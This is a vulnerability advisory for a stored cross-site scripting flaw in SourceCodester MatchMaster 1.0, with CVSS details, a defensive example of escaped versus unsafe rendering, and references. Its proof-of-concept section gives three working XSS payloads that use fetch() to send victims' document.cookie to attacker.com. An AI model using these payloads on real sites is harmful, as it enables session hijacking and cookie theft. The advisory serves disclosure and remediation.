Security Vulnerability Report
CVE-2025-63713 CVSS 6.1 MEDIUM

CVE-2025-63713

Published: 2025-11-07 18:15:36
Last Modified: 2025-11-18 19:33:05

Description

Cross-Site Scripting (XSS) vulnerability in SourceCodester "MatchMaster" 1.0 allows remote attackers to inject arbitrary web script or HTML via crafted input in the custom test creation feature. The vulnerability exists because the application fails to properly sanitize user-supplied input in test titles and matching pair items before rendering them in the DOM during test execution.
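The rendering defect described above, shown in a vulnerable and a hardened form. This is an added example, not code from the advisory or from the MatchMaster project; the function and field names (renderTestUnsafe, renderTestSafe, hasUnexpectedTags, title, pairs) are assumptions, and the sample test data is constructed.

```javascript
// Added example, not code from the advisory or the MatchMaster project.
// Names (renderTestUnsafe, renderTestSafe, hasUnexpectedTags, title, pairs) are assumed.

// Encode the characters that change meaning in HTML text or attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern (CWE-79): user-controlled strings are concatenated straight
// into markup, so a title containing "<script>" becomes a live element.
function renderTestUnsafe(test) {
  const rows = test.pairs.map(p => `<li>${p.left} = ${p.right}</li>`).join('');
  return `<h1>${test.title}</h1><ul>${rows}</ul>`;
}

// Hardened pattern: the same template, with every user-supplied value encoded first.
function renderTestSafe(test) {
  const rows = test.pairs
    .map(p => `<li>${escapeHtml(p.left)} = ${escapeHtml(p.right)}</li>`)
    .join('');
  return `<h1>${escapeHtml(test.title)}</h1><ul>${rows}</ul>`;
}

// Regression check for a test suite: the template itself emits only h1, ul and li,
// so any other tag name in the output must have come from user data.
function hasUnexpectedTags(html) {
  const allowed = new Set(['h1', 'ul', 'li']);
  const tags = [...html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)].map(m => m[1].toLowerCase());
  return tags.some(t => !allowed.has(t));
}

// Constructed sample: the title and one pair item carry markup, as in the advisory.
const sampleTest = {
  title: 'Capitals <script>alert(1)</script>',
  pairs: [
    { left: '<img src=x onerror=alert(1)>', right: 'Paris' },
    { left: 'Germany', right: 'Berlin' }
  ]
};

console.log('unsafe output injects markup:', hasUnexpectedTags(renderTestUnsafe(sampleTest)));
console.log('safe output injects markup:  ', hasUnexpectedTags(renderTestSafe(sampleTest)));
```

In a browser-side application like this one, assigning the values through textContent or createTextNode instead of building markup strings removes the need for the encoding step altogether.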

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

cpe:2.3:a:remyandrade:matching_type_test:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester MatchMaster 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-63713 PoC - XSS in MatchMaster 1.0
// This PoC demonstrates the XSS vulnerability in the test creation feature

// Payload 1: Stored XSS via Test Title
const xssPayloadTitle = '<script>\n fetch("https://attacker.com/steal?cookie=" + document.cookie)\n<\/script>';

// Payload 2: XSS via Matching Pair Item (using img onerror)
const xssPayloadItem = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+document.cookie)">';

// Payload 3: XSS using event handler
const xssPayloadEvent = '<svg/onload=fetch("https://attacker.com/exfil?"+btoa(document.cookie))>';

// Simulate creating a malicious test
function createMaliciousTest() {
  const testData = {
    title: xssPayloadTitle,
    pairs: [
      { left: xssPayloadItem, right: 'Correct Answer' },
      { left: 'Question 2', right: xssPayloadEvent }
    ]
  };
  // In a real attack, this would be submitted to the application
  console.log('Malicious test created with XSS payload');
  console.log('Payload will execute when victim views the test');
  return testData;
}

// When the victim views the test, the following happens:
// 1. Application retrieves test data from database
// 2. Test title is inserted into HTML without encoding: <h1>{user_input}</h1>
// 3. Browser executes the script tag
// 4. Attacker gains access to victim's session

createMaliciousTest();

References

https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63713/README7.md (Exploit, Mitigation, Third Party Advisory)
https://www.sourcecodester.com/javascript/18431/matching-type-test-using-html-css-and-javascript-source-code.html (Product)